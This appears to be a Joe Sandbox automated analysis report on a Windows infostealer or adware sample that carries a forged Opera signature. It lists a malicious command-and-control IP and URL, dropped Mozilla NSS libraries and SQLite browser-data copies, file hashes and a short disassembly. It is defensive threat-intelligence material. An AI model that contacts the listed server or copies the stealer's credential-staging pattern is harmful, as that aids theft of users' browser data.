C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\vcruntime140.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.13b0000.0.unpack	100%	Avira	ADWARE/Amonetize.Gen7	Download File
0.0.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.13b0000.0.unpack	100%	Avira	ADWARE/Amonetize.Gen7	Download File
0.3.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.de0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://89.208.103.4/a9de71948549020b4b91e4dc94a097d9	0%	Avira URL Cloud	safe
http://89.208.103.4/	0%	Virustotal		Browse
http://89.208.103.4/	0%	Avira URL Cloud	safe
http://www.opera.com0	0%	Avira URL Cloud	safe
https://mozilla.org0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://89.208.103.4/a9de71948549020b4b91e4dc94a097d9	true	Avira URL Cloud: safe	unknown
http://89.208.103.4/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
https://duckduckgo.com/chrome_newtab	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr	false		high
https://duckduckgo.com/ac/?q=	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
http://www.opera.com0	c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high
https://mozilla.org0	softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.1.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.208.103.4	unknown	Russian Federation		42569	PSKSET-ASRU	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682151
Start date and time:	2022-08-11 06:56:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/12@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 83.5% (good quality ratio 77.5%) Quality average: 80.8% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 98% Number of executed functions: 15 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.31.108.18, 23.211.6.115
Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, iris-de-prod-azsc-weu-b.westeurope.cloudapp.azure.com, arc.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
89.208.103.4	JT5cv271EG.exe	Get hash	malicious	Browse	89.208.103.4/040b6c7a685ac05a97f8c486f0db356b
89.208.103.4	SecuriteInfo.com.W32.AIDetect.malware1.8.exe	Get hash	malicious	Browse	89.208.103.4/61126696dc03bf20123c7c9daeebe6c5

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PSKSET-ASRU	JT5cv271EG.exe	Get hash	malicious	Browse	89.208.103.4
	SecuriteInfo.com.W32.AIDetect.malware1.8.exe	Get hash	malicious	Browse	89.208.103.4
	f_000026.exe	Get hash	malicious	Browse	89.208.120.8

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\LocalLow\freebl3.dll	OTsEaOh9CD.exe	Get hash	malicious	Browse
	9PEtEnNa67.exe	Get hash	malicious	Browse
	JT5cv271EG.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.8.exe	Get hash	malicious	Browse
	LD99fxWK0i.exe	Get hash	malicious	Browse
	kVz3TjCSty.exe	Get hash	malicious	Browse
	S6na0Wyt0k.exe	Get hash	malicious	Browse
	Document.pdf.exe	Get hash	malicious	Browse
	72sllrc17M.exe	Get hash	malicious	Browse
	Wb3nDR0vMj.exe	Get hash	malicious	Browse
	a8n8peP5O6.exe	Get hash	malicious	Browse
	rX9YoIq3xY.exe	Get hash	malicious	Browse
	bt3zwLS7t6.exe	Get hash	malicious	Browse
	KbqArOlW06.exe	Get hash	malicious	Browse
	QyxZ6r6qAl.exe	Get hash	malicious	Browse
	EI9RHDuRLy.exe	Get hash	malicious	Browse
	AgfjYihIxh.exe	Get hash	malicious	Browse
	MqYQkpHt4V.exe	Get hash	malicious	Browse
	0LYwkmJsgj.exe	Get hash	malicious	Browse
	qm63piuskI.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\1g8B3TB8nn75

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\9p1l6K91w23M

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	85120
Entropy (8bit):	7.9018755302773975
Encrypted:	false
SSDEEP:	1536:CKqfuGy/EQ/8tqsV4Jzh8tZn96+Z+F8iY/c+/j91YnJzticKhiVxp6694dY:kfxQf/dJh8f0+wF8H9ciKh+dY
MD5:	6DE2EB5476F66D15C1FA6C2C1BD9559A
SHA1:	FC07EEC53F0CFF114F55601E282B937C87136392
SHA-256:	928D987F8BBEF93BD78632FCE66311B9F0DDA680378CCBA1498FCAFC9E5D63C4
SHA-512:	9E88B8251702F6E3C9B3EC19830A6BB79F2959BA5E3DF65573CF813E9535F762923A9ADA3EC55F121283D033BC2860EF48763F8F8ABEFB8D49B56939F0201568
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\...x....Mj}9oE...7..........]..(...x..:.e...+..6..r.....#XP.Q^(.uz.........G...V_.~....3.c.o.?g.......z.8...Q...9(.Z.'.C...U...5..+....)h...i)M.,c.%z.....-..u.......#?.O.{..../.....x.?.......;~(..N.z...r..?.....*..X.[G...H..%..m...].U..n.&t..y".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.\|..).?.H.'.\|....).?m.....h.t......\|4.%..

C:\Users\user\AppData\LocalLow\U28DVK1LkhXI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	684984
Entropy (8bit):	6.857030838615762
Encrypted:	false
SSDEEP:	12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
MD5:	15B61E4A910C172B25FB7D8CCB92F754
SHA1:	5D9E319C7D47EB6D31AAED27707FE27A1665031C
SHA-256:	B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
SHA-512:	7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: OTsEaOh9CD.exe, Detection: malicious, Browse Filename: 9PEtEnNa67.exe, Detection: malicious, Browse Filename: JT5cv271EG.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.8.exe, Detection: malicious, Browse Filename: LD99fxWK0i.exe, Detection: malicious, Browse Filename: kVz3TjCSty.exe, Detection: malicious, Browse Filename: S6na0Wyt0k.exe, Detection: malicious, Browse Filename: Document.pdf.exe, Detection: malicious, Browse Filename: 72sllrc17M.exe, Detection: malicious, Browse Filename: Wb3nDR0vMj.exe, Detection: malicious, Browse Filename: a8n8peP5O6.exe, Detection: malicious, Browse Filename: rX9YoIq3xY.exe, Detection: malicious, Browse Filename: bt3zwLS7t6.exe, Detection: malicious, Browse Filename: KbqArOlW06.exe, Detection: malicious, Browse Filename: QyxZ6r6qAl.exe, Detection: malicious, Browse Filename: EI9RHDuRLy.exe, Detection: malicious, Browse Filename: AgfjYihIxh.exe, Detection: malicious, Browse Filename: MqYQkpHt4V.exe, Detection: malicious, Browse Filename: 0LYwkmJsgj.exe, Detection: malicious, Browse Filename: qm63piuskI.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	627128
Entropy (8bit):	6.792651884784197
Encrypted:	false
SSDEEP:	12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
MD5:	F07D9977430E762B563EAADC2B94BBFA
SHA1:	DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
SHA-256:	4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
SHA-512:	6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042296
Entropy (8bit):	6.775178510549486
Encrypted:	false
SSDEEP:	49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
MD5:	F67D08E8C02574CBC2F1122C53BFB976
SHA1:	6522992957E7E4D074947CAD63189F308A80FCF2
SHA-256:	C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
SHA-512:	2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\r93FRLGa73HG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254392
Entropy (8bit):	6.686038834818694
Encrypted:	false
SSDEEP:	6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
MD5:	63A1FE06BE877497C4C2017CA0303537
SHA1:	F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
SHA-256:	44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
SHA-512:	0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1099223
Entropy (8bit):	6.502588297211263
Encrypted:	false
SSDEEP:	24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
MD5:	DBF4F8DCEFB8056DC6BAE4B67FF810CE
SHA1:	BBAC1DD8A07C6069415C04B62747D794736D0689
SHA-256:	47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
SHA-512:	B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n................................... ...;...................................................................................text...............................`.P`.data...\|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..

C:\Users\user\AppData\LocalLow\t56OlInDWvo9

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.327729853786427
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
File size:	253424
MD5:	c5af2b53cf4b8d6177240a822ef6f350
SHA1:	32376015d14f746efa94473a7cb5ca7413f75dbf
SHA256:	c35d4e641adf21bead54611499c416c8e2de75ac9609832d1f32c476140c38d4
SHA512:	408fa474bf8faf4c600f321fefda25d8d3963ec42589fad00110326e23862787d3ba1f625adf74863ee48d1c77e0e81152d20e03643ac45225c5d27194c67e74
SSDEEP:	3072:WRs/UfISQNhFy8Zeo86wn6ff7/z4HshcmrXFloNmK0yb/I6hV5bIaQqR73vH6DrS:1cfQpIo8B6fFVY3dTvjSD1DjK/mK
TLSH:	DB44CE8039C0F479D865193114B4DAB1573DFC729FA18E9B6347456B0E332C38AADEAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.7..qYG.qYG.qYGk.ZFuqYGk.\F.qYGk.]FmqYGk.XF\|qYG..]FnqYG..ZFkqYG.qXG/qYG..\FWqYG..PF~qYG...G~qYG..[F~qYGRich.qYG........PE..L..

File Icon


Icon Hash:	32b68cd1f0b625db

Static PE Info

General

Entrypoint:	0x401ed1
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x62F47B99 [Thu Aug 11 03:46:33 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b8558d93f483c480fe68dcea321081d3

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	5/25/2022 5:00:00 PM 6/19/2024 4:59:59 PM
Subject Chain	CN=Opera Norway AS, O=Opera Norway AS, L=Oslo, S=Oslo, C=NO, SERIALNUMBER=916 368 127, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=NO
Version:	3
Thumbprint MD5:	9B8B28D33C3D8867B77D0248EF6E8944
Thumbprint SHA-1:	44D0357BE066320608E15D66057D34F6AB46011C
Thumbprint SHA-256:	CB2CEC648FA7D06ECCE1C6CCED9080FADBF81E53F4C4489EEF591DD939F10DE3
Serial:	0249A132815AF42E75A78D7098517EFD

Entrypoint Preview

Instruction
call 00007FC45CC3EC19h
jmp 00007FC45CC3E779h
cmp ecx, dword ptr [0041A014h]
jne 00007FC45CC3E903h
ret
jmp 00007FC45CC3EF69h
push ebp
mov ebp, esp
jmp 00007FC45CC3E90Fh
push dword ptr [ebp+08h]
call 00007FC45CC426AFh
pop ecx
test eax, eax
je 00007FC45CC3E911h
push dword ptr [ebp+08h]
call 00007FC45CC4272Bh
pop ecx
test eax, eax
je 00007FC45CC3E8E8h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007FC45CC3DAF2h
jmp 00007FC45CC3F033h
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007FC45CC3F045h
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
test byte ptr [ebp+08h], 00000001h
push esi
mov esi, ecx
mov dword ptr [esi], 004131A4h
je 00007FC45CC3E90Ch
push 0000000Ch
push esi
call 00007FC45CC3E8DDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FC45CC3E91Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FC45CC3E90Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FC45CC3E90Eh
add edx, 28h
cmp edx, esi
jne 00007FC45CC3E8ECh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007FC45CC3E8FBh
push esi
call 00007FC45CC3F1AEh
test eax, eax
je 00007FC45CC3E922h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x197b0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a000	0x126bd	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x3b400	0x29f0
